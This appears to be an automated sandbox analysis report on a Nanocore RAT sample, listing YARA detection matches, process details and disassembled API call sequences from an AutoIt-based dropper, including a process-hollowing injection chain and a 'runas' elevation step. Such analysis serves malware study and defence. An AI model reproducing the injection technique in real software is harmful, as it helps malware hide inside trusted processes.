<kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Avira
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 7108 Parent PID: 6976

General

Start time:	01:52:51
Start date:	19/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Imagebase:	0xa80000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152 Parent PID: 5632 e5bd3238d220c97cd4d6969abb3b33e0.exeCOMMON

Executed Functions

Function 040A00BE, Relevance: 18.4, APIs: 12, Instructions: 393threadinjectionmemoryCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 040A02E7
GetThreadContext.KERNELBASE(?,00010007), ref: 040A02FC
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040A031C
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 040A034A
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 040A0367
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 040A049B
VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 040A04B5
VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 040A051C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040A053E
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040A055D
SetThreadContext.KERNELBASE(?,00010007), ref: 040A057E
ResumeThread.KERNELBASE(?), ref: 040A058C

Memory Dump Source

Source File: 00000000.00000003.256390175.00000000040A0000.00000040.00000001.sdmp, Offset: 040A0000, based on PE: false

Similarity

API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
String ID:
API String ID: 12256240-0
Opcode ID: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
Instruction ID: 45fc44706233356733033d47d7b94e70bbfca5f674f7333a4851478034e8bc3b
Opcode Fuzzy Hash: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
Instruction Fuzzy Hash: E6F114B2E00219AFDB61CFA5CD44BAEBBB9FF48704F144569E949B7240D730AA94CF50

Uniqueness

Uniqueness Score: -1.00%

Function 009C3B4C, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 156windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009C3B7A
IsDebuggerPresent.KERNEL32 ref: 009C3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00A862F8,00A862E0,?,?), ref: 009C3BFD

Part of subcall function 009D0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,009C3C26,00A862F8,?,?,?), ref: 009D0ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 009C3C81
MessageBoxA.USER32 ref: 009FD4BC
SetCurrentDirectoryW.KERNEL32(?,00A862F8,?,?,?), ref: 009FD4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A75D40,00A862F8,?,?,?), ref: 009FD57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 009FD581

Part of subcall function 009C3A58: GetSysColorBrush.USER32(0000000F), ref: 009C3A62
Part of subcall function 009C3A58: LoadCursorW.USER32(00000000,00007F00), ref: 009C3A71
Part of subcall function 009C3A58: LoadIconW.USER32 ref: 009C3A88
Part of subcall function 009C3A58: LoadIconW.USER32 ref: 009C3A9A
Part of subcall function 009C3A58: LoadIconW.USER32 ref: 009C3AAC
Part of subcall function 009C3A58: LoadImageW.USER32 ref: 009C3AD2
Part of subcall function 009C3A58: RegisterClassExW.USER32 ref: 009C3B28

Part of subcall function 009C39E7: CreateWindowExW.USER32 ref: 009C3A15
Part of subcall function 009C39E7: CreateWindowExW.USER32 ref: 009C3A36
Part of subcall function 009C39E7: ShowWindow.USER32(00000000,?,?), ref: 009C3A4A
Part of subcall function 009C39E7: ShowWindow.USER32(00000000,?,?), ref: 009C3A53

Part of subcall function 009C43DB: Shell_NotifyIconW.SHELL32(?,?), ref: 009C44A6

Strings

This is a third-party compiled AutoIt script., xrefs: 009FD4B4
runas, xrefs: 009FD575

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 1385234928-3287110873
Opcode ID: 67a9ad79c038024b13084251c9b921f665d5fa0f00f39c0789b0b69779ab61a3
Instruction ID: b3efda56056531a3728cd10a6c1c35f579fcbc24bae5277c5dccf49c359348d0
Opcode Fuzzy Hash: 67a9ad79c038024b13084251c9b921f665d5fa0f00f39c0789b0b69779ab61a3
Instruction Fuzzy Hash: 65510635D04248BEDB11EBF4DC05FFE7B79AB85300F00C1ADF851A61A2EA759642CB22

Uniqueness

Uniqueness Score: -1.00%

Function 009C4AFE, Relevance: 10.7, APIs: 7, Instructions: 228COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 009C4B2B
GetCurrentProcess.KERNEL32(?,00A4FAEC,00000000,00000000,?), ref: 009C4BF8
IsWow64Process.KERNEL32(00000000), ref: 009C4BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 009C4C45
FreeLibrary.KERNEL32(00000000), ref: 009C4C50
GetSystemInfo.KERNEL32(00000000), ref: 009C4C81
GetSystemInfo.KERNEL32(00000000), ref: 009C4C8D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64
String ID:
API String ID: 2813406015-0
Opcode ID: 15054b577f26dd0589ab40fc173c12434b93419d925b4a868ab01c24b03a9e88
Instruction ID: c9241b377cfa787e9700195cc699945393272881802e4caeb18da5a45e653d92
Opcode Fuzzy Hash: 15054b577f26dd0589ab40fc173c12434b93419d925b4a868ab01c24b03a9e88
Instruction Fuzzy Hash: E091E835D4A7C4DEC731CB789461AAAFFE9AF66300B444E5DD1CB83A01D224E908D72A

Uniqueness

Uniqueness Score: -1.00%

Function 00A23D4E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C48A1,?,?,009C37C0,?), ref: 009C48CE

Part of subcall function 00A24CD3: GetFileAttributesW.KERNELBASE(?,00A24FAB), ref: 00A24CD4

FindFirstFileW.KERNELBASE(?,?), ref: 00A23DC5
DeleteFileW.KERNEL32(?,?,?,?), ref: 00A23E15
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A23E26
FindClose.KERNEL32(00000000), ref: 00A23E3D
FindClose.KERNEL32(00000000), ref: 00A23E46

Strings

\*.*, xrefs: 00A23D97

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: bed209dec0f86143605928a713c5c86bba40c595597b1e9db9a60aeff067be11
Instruction ID: 160a39130cf9f1e4b8a24ebf2230a082772df9b384960d72bf5005f07fedc9f3
Opcode Fuzzy Hash: bed209dec0f86143605928a713c5c86bba40c595597b1e9db9a60aeff067be11
Instruction Fuzzy Hash: 5F318D36408395AFC601EFA4EC95EEFB7E8AE96300F444D2DF0D182091DB25DA09CB63

Uniqueness

Uniqueness Score: -1.00%

Function 009C4FE9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009C4EEE,?,?,00000000), ref: 009C4FF9
FindResourceExW.KERNEL32(00000000,0000000A,SCRIPT,00000000,?,?,009C4EEE,?,?,00000000), ref: 009C5010
LoadResource.KERNEL32(00000000,00000000,?,?,009C4EEE,?,?,00000000,?,?,?,?,?,?,?,009C4F8F), ref: 009FDD60
SizeofResource.KERNEL32(00000000,00000000,?,?,009C4EEE,?,?,00000000,?,?,?,?,?,?,?,009C4F8F), ref: 009FDD75
LockResource.KERNEL32(009C4EEE,?,?,009C4EEE,?,?,00000000,?,?,?,?,?,?,?,009C4F8F,00000000), ref: 009FDD88

Strings

SCRIPT, xrefs: 009C5006

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: b4f604a7730ac40605b07335eb5181100af59096c66654f66f7266c0053c22ac
Instruction ID: e9ffc3061d8a7456bf291e9269cd4b8a3fca7b80866817001f08600f773f657e
Opcode Fuzzy Hash: b4f604a7730ac40605b07335eb5181100af59096c66654f66f7266c0053c22ac
Instruction Fuzzy Hash: 19113679600704BFE720CBA5AC58FA77BBDEBC6B51F20452CF50AC6160DA62E841C661

Uniqueness

Uniqueness Score: -1.00%

Function 00A2BBA6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 009C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C48A1,?,?,009C37C0,?), ref: 009C48CE

CoInitialize.OLE32(00000000), ref: 00A2BC26
CoCreateInstance.OLE32(00A52D6C,00000000,00000001,00A52BDC,?), ref: 00A2BC3F
CoUninitialize.OLE32 ref: 00A2BC5C

Strings

.lnk, xrefs: 00A2BC08, 00A2BC16

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize
String ID: .lnk
API String ID: 3769357847-24824748
Opcode ID: 2366b40acd26824f8335f8f7a044d6b3b683fc261834ccf49efbf3a42e1da615
Instruction ID: 10b79b35734ff6972d6d947a3620942d9766470adfdecb701bb4453d7d4d598f
Opcode Fuzzy Hash: 2366b40acd26824f8335f8f7a044d6b3b683fc261834ccf49efbf3a42e1da615
Instruction Fuzzy Hash: 0FA133756042119FCB00DF18C884E6ABBE5FF89314F15899CF8999B3A1CB31ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A23E91, Relevance: 6.1, APIs: 4, Instructions: 89processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A23EB6
Process32FirstW.KERNEL32(00000000,?), ref: 00A23EC4
Process32NextW.KERNEL32(00000000,?), ref: 00A23EE4
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00A23F8E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: c3915879c00c3e1305f5a98c3312f1097429b8cdd9035fe234f17e5b47182da9
Instruction ID: fd5dcf9b2439d38fb155318d587b6c6f586eaeb32a26428e43cbf345c09495ba
Opcode Fuzzy Hash: c3915879c00c3e1305f5a98c3312f1097429b8cdd9035fe234f17e5b47182da9
Instruction Fuzzy Hash: 803170725082059FD304EF94E885FBFBBF8EBC6354F14052DF191861A1DB61AA49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A24696, Relevance: 4.5, APIs: 3, Instructions: 27fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?), ref: 00A246A6
FindFirstFileW.KERNELBASE(?,?), ref: 00A246B7
FindClose.KERNEL32(00000000), ref: 00A246C7

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: edb0c6e71ecd7c2f8af3d2f2d478d83b29c9151f9f4ac6c749fc8024c29d3cac
Instruction ID: a18a505428409a93f7fa765c57bfef193eec57c95b9f72c9dedc9d59f99b4837
Opcode Fuzzy Hash: edb0c6e71ecd7c2f8af3d2f2d478d83b29c9151f9f4ac6c749fc8024c29d3cac
Instruction Fuzzy Hash: A7E04F3A501820AF9610A7B8FC4D8FB7B5CDE4B3BAB100726F535C18E0E7B2995195A6

Uniqueness

Uniqueness Score: -1.00%

Function 009D0B30, Relevance: 57.4, APIs: 27, Strings: 5, Instructions: 1355windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 009D0BBB
timeGetTime.WINMM ref: 009D0E76
PeekMessageW.USER32 ref: 009D0FB3
TranslateMessage.USER32(?), ref: 009D0FC7
DispatchMessageW.USER32 ref: 009D0FD5
Sleep.KERNELBASE(0000000A), ref: 009D0FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 009D105A
DestroyWindow.USER32 ref: 009D1066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009D1080
Sleep.KERNEL32(0000000A,?,?), ref: 00A052AD
TranslateMessage.USER32(?), ref: 00A0608A
DispatchMessageW.USER32 ref: 00A06098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A060AC

Strings

@GUI_CTRLHANDLE, xrefs: 00A0540E
@TRAY_ID, xrefs: 00A05BB9
@COM_EVENTOBJ, xrefs: 00A0591A
@GUI_WINHANDLE, xrefs: 00A053B9
@GUI_CTRLID, xrefs: 00A05364

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: ea7736a24da83408e4210c54f51fb9eda45782fd3305de54e6438264e12278b8
Instruction ID: d4a35adcfb226c3ac6f55c995ff1fcaab535df880ba6093fb44a37b460f18bf9
Opcode Fuzzy Hash: ea7736a24da83408e4210c54f51fb9eda45782fd3305de54e6438264e12278b8
Instruction Fuzzy Hash: 17B2DE70A08741DFD724DF64D885BAABBE4BF85304F14891EF18A87291DB71E885CF92

Uniqueness

Uniqueness Score: -1.00%

Function 009D5F88, Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 358COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00A4F910,?,?,?,?,?), ref: 009D6042
IsWindow.USER32(?), ref: 00A10FFA

Strings

TITLE, xrefs: 00A10F8F
HANDLE, xrefs: 00A10DDD
ALL, xrefs: 00A10F61
LAST, xrefs: 00A10DB1
INSTANCE, xrefs: 00A10F39
REGEXPTITLE, xrefs: 00A10DF3
REGEXPCLASS, xrefs: 00A10E45
ACTIVE, xrefs: 00A10DC7
CLASS, xrefs: 00A10E24

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: 442e827ba913d82433ea736783e96c8be1e9eccb1023b4169450b307ca441990
Instruction ID: f12c9d6b9b617a3c396a3110e60a1585f9166e639f603541e1392259ffe07841
Opcode Fuzzy Hash: 442e827ba913d82433ea736783e96c8be1e9eccb1023b4169450b307ca441990
Instruction Fuzzy Hash: 0AD1D530504342AFCB14EF61C841EDABBB4BF94354F108A2DF099535A2DB71E9DACB92

Uniqueness

Uniqueness Score: -1.00%

Function 009C3015, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 009C3074
RegisterClassExW.USER32 ref: 009C309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009C30AF
InitCommonControlsEx.COMCTL32(?), ref: 009C30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009C30DC
LoadIconW.USER32 ref: 009C30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009C3101

Strings

AutoIt v3 GUI, xrefs: 009C3090
0, xrefs: 009C3056
TaskbarCreated, xrefs: 009C30A4
+, xrefs: 009C305D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: c1b7b91d8bac71f450714b9930b29c81e17e93aaf685f487c1dfcf6b5b49a878
Instruction ID: 2ec82b5587e3e4d6179522d44fc84f65f6172d2b2d21d1fe1c01b66a1b2fbd5a
Opcode Fuzzy Hash: c1b7b91d8bac71f450714b9930b29c81e17e93aaf685f487c1dfcf6b5b49a878
Instruction Fuzzy Hash: 6F313AB9941309EFEB50CFE4D889AC9BFF4FB49310F10452AE584A62A0E7BA0542CF51

Uniqueness

Uniqueness Score: -1.00%

Function 009C3041, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 55windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 009C3074
RegisterClassExW.USER32 ref: 009C309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009C30AF
InitCommonControlsEx.COMCTL32(?), ref: 009C30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009C30DC
LoadIconW.USER32 ref: 009C30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009C3101

Strings

AutoIt v3 GUI, xrefs: 009C3090
0, xrefs: 009C3056
TaskbarCreated, xrefs: 009C30A4
+, xrefs: 009C305D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: a585ff558e4fc2c858abe8358d0e9c3f3e161c7095a691386fadce2344a302c6
Instruction ID: 38c33a68919946dadc75c85ff4ee216e662f397e57a516b1865c460125475807
Opcode Fuzzy Hash: a585ff558e4fc2c858abe8358d0e9c3f3e161c7095a691386fadce2344a302c6
Instruction Fuzzy Hash: E821E2B9D40208AFEB00DFE4E888BDEBBF4FB49710F00512AF514A62A0D7B64546CF91

Uniqueness

Uniqueness Score: -1.00%

Function 009C3633, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 009C36D2
KillTimer.USER32(?,00000001), ref: 009C36FC
SetTimer.USER32 ref: 009C371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009C372A
CreatePopupMenu.USER32 ref: 009C373E
PostQuitMessage.USER32(00000000), ref: 009C375F

